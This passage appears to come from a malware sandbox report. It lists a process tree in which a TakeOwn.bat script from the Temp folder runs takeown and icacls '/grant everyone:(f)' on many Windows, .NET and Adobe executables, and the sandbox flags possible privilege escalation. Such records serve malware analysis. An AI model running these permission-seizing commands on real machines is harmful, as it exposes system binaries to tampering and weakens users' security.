  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\GameBar.exe"
  2⤵
  PID:2928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\GameBar.exe"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\GameBar.exe" /grant "everyone":(f)
    3⤵
    PID:6116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\XboxIdp.exe"
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\XboxIdp.exe"
    3⤵
    - Modifies file permissions
    PID:2032
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\XboxIdp.exe" /grant "everyone":(f)
    3⤵
    PID:4544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe"
  2⤵
  PID:6076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe"
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Music.UI.exe"
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Music.UI.exe"
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Music.UI.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:3000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Video.UI.exe"
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Video.UI.exe"
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Video.UI.exe" /grant "everyone":(f)
    3⤵
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrobroker.exe" /grant "everyone":(f)
    3⤵
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe"
  2⤵
  PID:2392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:4632
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe" /grant "everyone":(f)
    3⤵
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe"
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe"
    3⤵
    PID:5292
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32Info.exe" /grant "everyone":(f)
    3⤵
    PID:5972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe"
  2⤵
  PID:5100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe"
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\acrotextextractor.exe" /grant "everyone":(f)
    3⤵
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe"
  2⤵
  PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:6064
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adelrcp.exe" /grant "everyone":(f)
    3⤵
    PID:3296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe"
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AdobeCollabSync.exe" /grant "everyone":(f)
    3⤵
    PID:1224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe"
  2⤵
  PID:4672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:5076
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\eula.exe" /grant "everyone":(f)
    3⤵
    PID:512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe"
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\logtransport2.exe" /grant "everyone":(f)
    3⤵
    PID:5200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe"
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe"
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\rdrservicesupdater.exe" /grant "everyone":(f)
    3⤵
    PID:5196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe"
  2⤵
  PID:5148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe"
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\reader_sl.exe" /grant "everyone":(f)
    3⤵
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe"
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe"
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe" /grant "everyone":(f)
    3⤵
    PID:192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe"
  2⤵
  PID:5584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe"
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe" /grant "everyone":(f)
    3⤵
    PID:5672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - System Location Discovery: System Language Discovery
    PID:5820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
  2⤵
  PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_64\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"
  2⤵
  PID:500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe"
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:96
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe"
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\dfsvc\v4.0_4.0.0.0__b03f5f7f11d50a3a\dfsvc.exe" /grant "everyone":(f)
    3⤵
    PID:4864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe"
  2⤵
  PID:404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.exe" /grant "everyone":(f)
    3⤵
    PID:3064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"
  2⤵
  PID:2172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe"
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe" /grant "everyone":(f)
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatConfig.exe" /grant "everyone":(f)
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"
  2⤵
  PID:4392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe"
    3⤵
    - Modifies file permissions
    PID:4200
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\NETFXSBS10.exe" /grant "everyone":(f)
    3⤵
    PID:1208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe"
  2⤵
  PID:2548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe" /grant "everyone":(f)
    3⤵
    PID:3316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
  2⤵
  PID:932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe"
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe"
    3⤵
    PID:5512
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.exe" /grant "everyone":(f)
    3⤵
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe"
  2⤵
  PID:5488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe"
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - System Location Discovery: System Language Discovery
    PID:4612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe"
  2⤵
  PID:5296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe"
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.exe" /grant "everyone":(f)
    3⤵
    PID:5732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe"
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe"
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe" /grant "everyone":(f)
    3⤵
    PID:4940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe"
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe"
    3⤵
    - Modifies file permissions
    PID:4020
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.exe" /grant "everyone":(f)
    3⤵
    PID:5468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"
  2⤵
  PID:5864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe"
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe" /grant "everyone":(f)
    3⤵
    PID:5248
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:2180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe"
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:3464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe"
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe"
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe" /grant "everyone":(f)
    3⤵
    PID:4508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe"
  2⤵
  PID:5912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe" /grant "everyone":(f)
    3⤵
    PID:6132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe"
  2⤵
  PID:3444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5536
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe" /grant "everyone":(f)
    3⤵
    PID:5420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe"
  2⤵
  PID:2816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe"
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - System Location Discovery: System Language Discovery
    PID:1424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe" /grant "everyone":(f)
    3⤵
    PID:6048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe"
  2⤵
  PID:5888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe"
    3⤵
    PID:5728
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe" /grant "everyone":(f)
    3⤵
    PID:6092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
  2⤵
  PID:6096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5928
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"
